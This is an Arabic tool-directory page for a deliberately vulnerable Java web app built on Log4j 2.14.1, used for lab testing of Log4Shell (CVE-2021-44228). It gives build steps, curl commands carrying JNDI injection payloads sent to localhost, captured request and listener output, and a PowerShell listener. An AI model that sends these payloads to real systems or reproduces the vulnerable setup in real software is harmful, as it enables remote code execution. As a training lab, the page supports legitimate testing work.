Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
l4s-vulnapp — هذا تطبيق ويب جافا يحتمل أن يكون ضعيفًا يحتوي على Log4j المتأثر بـ log4shell (CVE-2021-44228). | Kitploit
أدوات/GitHubGitHub/ktokkawu/l4s-vulnapp
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubktokkawu/l4s-vulnapp

l4s-vulnapp

هذا تطبيق ويب جافا يحتمل أن يكون ضعيفًا يحتوي على Log4j المتأثر بـ log4shell (CVE-2021-44228).

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تطبيق Log4Shell الضعيف (l4s-vulnapp)

هذا تطبيق ويب Java يحتمل أن يكون ضعيفًا ويحتوي على Log4j (2.14.1) المتأثر بـ log4shell (CVE-2021-44228).

البيئة المثبتة والإصدارات المختلفة

  • AdoptOpenJDK 17.0.10+7
  • Gradle 8.6
  • Gretty 4.1.2
  • Apache Tomcat 10.1.15
  • Apache Log4j Core 2.14.1

التحضير

  • قم بتنزيل واستخراج ملف zip لـ AdoptOpenJDK.
  • قم بتعيين متغيري PATH و JAVA_HOME.
  • نفذ الأمر java --version للتحقق من أن AdoptOpenJDK يعمل بشكل صحيح.

[ملاحظة]
إذا كنت ترغب في تغيير إصدار JDK أو منفذ tomcat إلخ، قم بتعديل build.gradle.

البناء والتشغيل

نفذ مُغلِّف Gradle مع build.gradle.

root@kitploit:~
# على Linux
./gradlew appRun

# على Windows
.\gradlew.bat appRun

الرابط الرئيسي:

root@kitploit:~
http://localhost:8080/l4s-vulnapp/

[ملاحظة]
يتم تفعيل Log4Shell فقط عندما يقوم التطبيق بتسجيل بعض السجلات باستخدام Log4j.
على سبيل المثال، إذا تم الوصول إلى الرابط التالي، سيتم تنفيذ Log4Shell.

root@kitploit:~
http://localhost:8080/l4s-vulnapp/servlet

يمكنك التحقق من Log4Shell عن طريق التلاعب بقيمة "x-param" أو إضافة رأس "x-log" إلى طلب HTTP عند الوصول إليه.
سيتم تسجيل هذه المعاملات بواسطة Log4j.
ومع ذلك، هذا فقط إذا كان هناك خادم استماع يعمل على localhost:8081.

root@kitploit:~
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D

نتائج التحقق

  • طلب HTTP

    root@kitploit:~
    GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
    Host: localhost:8080
    Connection: keep-alive
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)   Chrome/122.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/  *;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8080/l4s-vulnapp/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: ja,en-US;q=0.9,en;q=0.8
    
    
    
  • استجابة HTTP

    root@kitploit:~
    HTTP/1.1 200
    Content-Type: text/plain;charset=utf-8
    Content-Length: 62
    Date: Fri, 15 Mar 2024 18:42:56 GMT
    Keep-Alive: timeout=60
    Connection: keep-alive
    
    Hello
    Logging to console using vulnerable Log4j2 by parameter
    
  • طلب RMI من l4s-vulnapp

    root@kitploit:~
    2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
    2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
    2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
    2024/03/16 03:42:55: [Hex data] ===== start =====
    2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
    2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    2024/03/16 03:42:56: [Hex data] =====  end  =====
    2024/03/16 03:42:56: [Raw data] ===== start =====
    2024/03/16 03:42:56: JRMI
    2024/03/16 03:42:56: [Raw data] =====  end  =====
    

الخيار

يبدأ l4s-ls.ps1 خادم استماع، قم بتشغيل هذا السكريبت في Windows PowerShell/Command Prompt.
يستقبل هذا الخادم الاتصالات الثنائية مثل LDAP و RMI، ويمكنه عرض محتويات هذه الاتصالات بصيغة Hex و Raw.
إذا تعطل السكريبت، استخدم Ctrl + C لإيقافه.

[تحذير]
عند تشغيل هذا السكريبت لأول مرة، من الضروري تحديد "شبكة خاصة" في نافذة Windows المنبثقة.

root@kitploit:~
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081

المراجع

  • GitHub - tothi/log4shell-vulnerable-app
  • ももいろテクノロジー - PowerShellでnc(netcat)を書いてみる (2015/4/16)
تنزيل الأداة